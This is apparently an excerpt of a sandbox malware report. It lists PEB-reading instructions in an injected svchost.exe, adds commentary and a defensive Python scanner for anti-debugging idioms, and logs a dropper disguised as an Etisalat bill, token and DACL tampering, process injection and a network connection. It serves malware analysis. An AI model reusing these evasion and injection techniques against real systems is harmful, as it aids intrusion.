          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A020 mov eax, dword ptr fs:[00000030h]2_2_0302A020
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302C020 mov eax, dword ptr fs:[00000030h]2_2_0302C020
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C6030 mov eax, dword ptr fs:[00000030h]2_2_030C6030
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03032050 mov eax, dword ptr fs:[00000030h]2_2_03032050
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6050 mov eax, dword ptr fs:[00000030h]2_2_030B6050
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305C073 mov eax, dword ptr fs:[00000030h]2_2_0305C073
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303208A mov eax, dword ptr fs:[00000030h]2_2_0303208A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030280A0 mov eax, dword ptr fs:[00000030h]2_2_030280A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C80A8 mov eax, dword ptr fs:[00000030h]2_2_030C80A8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F60B8 mov eax, dword ptr fs:[00000030h]2_2_030F60B8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F60B8 mov ecx, dword ptr fs:[00000030h]2_2_030F60B8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B20DE mov eax, dword ptr fs:[00000030h]2_2_030B20DE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0302A0E3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030380E9 mov eax, dword ptr fs:[00000030h]2_2_030380E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B60E0 mov eax, dword ptr fs:[00000030h]2_2_030B60E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302C0F0 mov eax, dword ptr fs:[00000030h]2_2_0302C0F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030720F0 mov ecx, dword ptr fs:[00000030h]2_2_030720F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C700 mov eax, dword ptr fs:[00000030h]2_2_0306C700
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03030710 mov eax, dword ptr fs:[00000030h]2_2_03030710
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03060710 mov eax, dword ptr fs:[00000030h]2_2_03060710
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C720 mov eax, dword ptr fs:[00000030h]2_2_0306C720
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C720 mov eax, dword ptr fs:[00000030h]2_2_0306C720
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306273C mov eax, dword ptr fs:[00000030h]2_2_0306273C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306273C mov ecx, dword ptr fs:[00000030h]2_2_0306273C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306273C mov eax, dword ptr fs:[00000030h]2_2_0306273C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AC730 mov eax, dword ptr fs:[00000030h]2_2_030AC730
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306674D mov esi, dword ptr fs:[00000030h]2_2_0306674D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306674D mov eax, dword ptr fs:[00000030h]2_2_0306674D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306674D mov eax, dword ptr fs:[00000030h]2_2_0306674D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03030750 mov eax, dword ptr fs:[00000030h]2_2_03030750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BE75D mov eax, dword ptr fs:[00000030h]2_2_030BE75D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072750 mov eax, dword ptr fs:[00000030h]2_2_03072750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072750 mov eax, dword ptr fs:[00000030h]2_2_03072750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B4755 mov eax, dword ptr fs:[00000030h]2_2_030B4755
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03038770 mov eax, dword ptr fs:[00000030h]2_2_03038770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D678E mov eax, dword ptr fs:[00000030h]2_2_030D678E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030307AF mov eax, dword ptr fs:[00000030h]2_2_030307AF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E47A0 mov eax, dword ptr fs:[00000030h]2_2_030E47A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303C7C0 mov eax, dword ptr fs:[00000030h]2_2_0303C7C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B07C3 mov eax, dword ptr fs:[00000030h]2_2_030B07C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030527ED mov eax, dword ptr fs:[00000030h]2_2_030527ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030527ED mov eax, dword ptr fs:[00000030h]2_2_030527ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030527ED mov eax, dword ptr fs:[00000030h]2_2_030527ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BE7E1 mov eax, dword ptr fs:[00000030h]2_2_030BE7E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030347FB mov eax, dword ptr fs:[00000030h]2_2_030347FB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030347FB mov eax, dword ptr fs:[00000030h]2_2_030347FB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE609 mov eax, dword ptr fs:[00000030h]2_2_030AE609
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072619 mov eax, dword ptr fs:[00000030h]2_2_03072619
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E627 mov eax, dword ptr fs:[00000030h]2_2_0304E627
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03066620 mov eax, dword ptr fs:[00000030h]2_2_03066620
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03068620 mov eax, dword ptr fs:[00000030h]2_2_03068620
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303262C mov eax, dword ptr fs:[00000030h]2_2_0303262C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304C640 mov eax, dword ptr fs:[00000030h]2_2_0304C640
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F866E mov eax, dword ptr fs:[00000030h]2_2_030F866E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F866E mov eax, dword ptr fs:[00000030h]2_2_030F866E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A660 mov eax, dword ptr fs:[00000030h]2_2_0306A660
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A660 mov eax, dword ptr fs:[00000030h]2_2_0306A660
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03062674 mov eax, dword ptr fs:[00000030h]2_2_03062674
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03034690 mov eax, dword ptr fs:[00000030h]2_2_03034690
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03034690 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0306C6A6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030666B0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0306A6C7 mov ebx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0306A6C7 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030AE6F2 mov eax, dword ptr fs:[00000030h] (4 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030B06F1 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030C6500 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03104500 mov eax, dword ptr fs:[00000030h] (7 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03040535 mov eax, dword ptr fs:[00000030h] (6 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h] (5 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03038550 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0306656A mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03032582 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03032582 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03064588 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0306E59C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030B05A7 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030545B1 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0306E5CF mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030365D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0306A5D0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h] (8 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030325E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0306C5ED mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03068402 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0302E420 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0302C427 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h] (7 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0306A430 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h] (8 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030EA456 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0302645D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0305245A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030BC460 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0305A470 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030EA49A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030364AB mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030644B0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030BA4B0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030304E5 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03104B00 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h] (9 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0305EB20 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030F8B28 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030E4B4B mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03102B57 mov eax, dword ptr fs:[00000030h] (4 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030C6B40 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030FAB40 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030D8B42 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03028B50 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030DEB50 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0302CB7E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03040BBE mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030E4BB0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03050BCB mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03030BCD mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030DEBD0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03038BF0 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0305EBFC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030BCBF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030BCA11 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0306CA24 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0305EA2E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03054A35 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0306CA38 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h] (7 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03040A5B mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0306CA6F mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030DEA60 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030ACA72 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h] (9 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03104A80 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03068A90 mov edx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03038AA0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03086AA4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03086ACC mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03030AD0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03064AD0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0306AAEE mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030AE908 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030BC912 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03028918 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030B892A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030C892B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030B0946 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03104940 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03056962 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0307096E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0307096E mov edx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0307096E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030D4978 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030BC97C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h] (13 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030309AD mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030B89B3 mov esi, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030B89B3 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030C69C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h] (6 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030649D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030FA9D3 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030BE9E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030629F9 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030BC810 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03052835 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03052835 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03052835 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0306A830 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030D483A mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03042840 mov ecx, dword ptr fs:[00000030h]
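The fs:[30h] loads listed above are reads of the PEB pointer out of the TEB in the 32-bit (WoW64) svchost.exe the payload runs in. The report records only the load, not which PEB field is consumed afterwards; in the x86 layout the fields malware reaches for from here are BeingDebugged (+0x02), Ldr (+0x0C, used to resolve APIs by walking the loaded-module lists without an import table) and NtGlobalFlag (+0x68, whose heap-debug bits 0x70 are set when a process is started under a debugger). The scanner below is an added example, not Joe Sandbox code: it finds every encoding of `mov <reg>, dword ptr fs:[30h]` in a byte buffer (the short A1 form exists only for eax; the other registers in the list are the 8B/ModRM form) and, where the next instruction is one of the idioms named in its comments, reports the field. The sample bytes are constructed, not dumped from this sample.

```python
"""Static scan for the 32-bit PEB-read idiom "mov <reg>, dword ptr fs:[30h]".

Added example, not part of the Joe Sandbox report. The SAMPLE bytes are
constructed by hand to mirror the report's findings; they are not a dump
of the analysed process.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# ModRM reg field -> register name (mov r32, fs:[disp32] uses mod=00, rm=101)
_REG = {0: "eax", 1: "ecx", 2: "edx", 3: "ebx", 4: "esp", 5: "ebp", 6: "esi", 7: "edi"}

# "mov <reg>, dword ptr fs:[30h]": FS segment prefix 0x64, then either the
# short moffs32 form (A1, eax only) or 8B with ModRM 00 reg 101 and disp32.
PEB_LOAD = re.compile(
    rb"\x64(?:\xA1|\x8B([\x05\x0D\x15\x1D\x25\x2D\x35\x3D]))\x30\x00\x00\x00"
)

# x86 PEB field offsets the follow-up "mov r32, [reg+disp8]" is matched against.
_PEB_FIELDS = {0x0C: "Ldr", 0x68: "NtGlobalFlag"}


@dataclass(frozen=True)
class PebAccess:
    offset: int     # offset of the fs:[30h] load in the buffer
    register: str   # register that receives the PEB pointer
    field: str      # PEB field touched next, or "peb-read" if not recognised


def _classify_followup(buf: bytes, pos: int, r: int) -> str:
    """Name the PEB field read by the instruction at buf[pos] if it is one of
    the idioms below with base register r (mod=01, rm=r; r=esp would need a
    SIB byte and is deliberately not handled)."""
    b = buf[pos:pos + 4]
    if len(b) < 3:
        return "peb-read"
    base = 0x40 | r
    # movzx r32, byte ptr [r+2]     -> PEB.BeingDebugged
    if b[0] == 0x0F and b[1] == 0xB6 and len(b) == 4 and (b[2] & 0xC7) == base and b[3] == 0x02:
        return "BeingDebugged"
    # cmp byte ptr [r+2], 0         -> PEB.BeingDebugged (80 /7 ib)
    if b[0] == 0x80 and (b[1] & 0xC7) == base and (b[1] & 0x38) == 0x38 and b[2] == 0x02:
        return "BeingDebugged"
    # mov r32, dword ptr [r+disp8]  -> PEB.Ldr (+0Ch) or PEB.NtGlobalFlag (+68h)
    if b[0] == 0x8B and (b[1] & 0xC7) == base:
        return _PEB_FIELDS.get(b[2], "peb-read")
    # test byte ptr [r+68h], 70h    -> NtGlobalFlag heap-debug flags (F6 /0 ib)
    if (b[0] == 0xF6 and (b[1] & 0xC7) == base and (b[1] & 0x38) == 0
            and b[2] == 0x68 and len(b) == 4 and b[3] == 0x70):
        return "NtGlobalFlag"
    return "peb-read"


def scan_peb_accesses(buf: bytes) -> list[PebAccess]:
    """Return every fs:[30h] load in buf with the register used and, where the
    next instruction is a known idiom, the PEB field it reads."""
    hits = []
    for m in PEB_LOAD.finditer(buf):
        modrm = m.group(1)
        r = 0 if modrm is None else (modrm[0] >> 3) & 7
        hits.append(PebAccess(m.start(), _REG[r], _classify_followup(buf, m.end(), r)))
    return hits


def summarize(hits: list[PebAccess]) -> dict[str, int]:
    """Count hits per PEB field, the way a triage note would report them."""
    counts: dict[str, int] = {}
    for h in hits:
        counts[h.field] = counts.get(h.field, 0) + 1
    return counts


# Constructed input: four PEB loads with different follow-ups (comments give
# the intended disassembly).
SAMPLE = bytes.fromhex(
    "64A130000000"    # mov eax, dword ptr fs:[30h]
    "0FB64002"        # movzx eax, byte ptr [eax+2]   ; BeingDebugged
    "85C0"            # test eax, eax
    "648B1D30000000"  # mov ebx, dword ptr fs:[30h]
    "8B4368"          # mov eax, dword ptr [ebx+68h]  ; NtGlobalFlag
    "648B0D30000000"  # mov ecx, dword ptr fs:[30h]
    "8B410C"          # mov eax, dword ptr [ecx+0Ch]  ; Ldr
    "648B3530000000"  # mov esi, dword ptr fs:[30h]
    "C3"              # ret                           ; no recognised follow-up
)

if __name__ == "__main__":
    for hit in scan_peb_accesses(SAMPLE):
        print(f"+0x{hit.offset:04x}: mov {hit.register}, fs:[30h] -> {hit.field}")
    print(summarize(scan_peb_accesses(SAMPLE)))
```

Run it over a dumped section of the injected svchost.exe to turn the flat list above into per-field counts. A high share of "peb-read" with no recognised follow-up usually means the pointer is passed on in a register before being dereferenced, which this single-instruction lookahead will not see; treat the field labels as a hint for where to set breakpoints, not as a verdict.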
Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe | Code function: 0_2_00BB81F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
Source: C:\Windows\SysWOW64\svchost.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe | Code function: 0_2_00B8A395 SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe | Code function: 0_2_00B8A364 SetUnhandledExceptionFilter
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_00AE14D0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_00AE1720 SetUnhandledExceptionFilter

          HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\explorer.exe | Network Connect: 103.224.212.212:80
Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
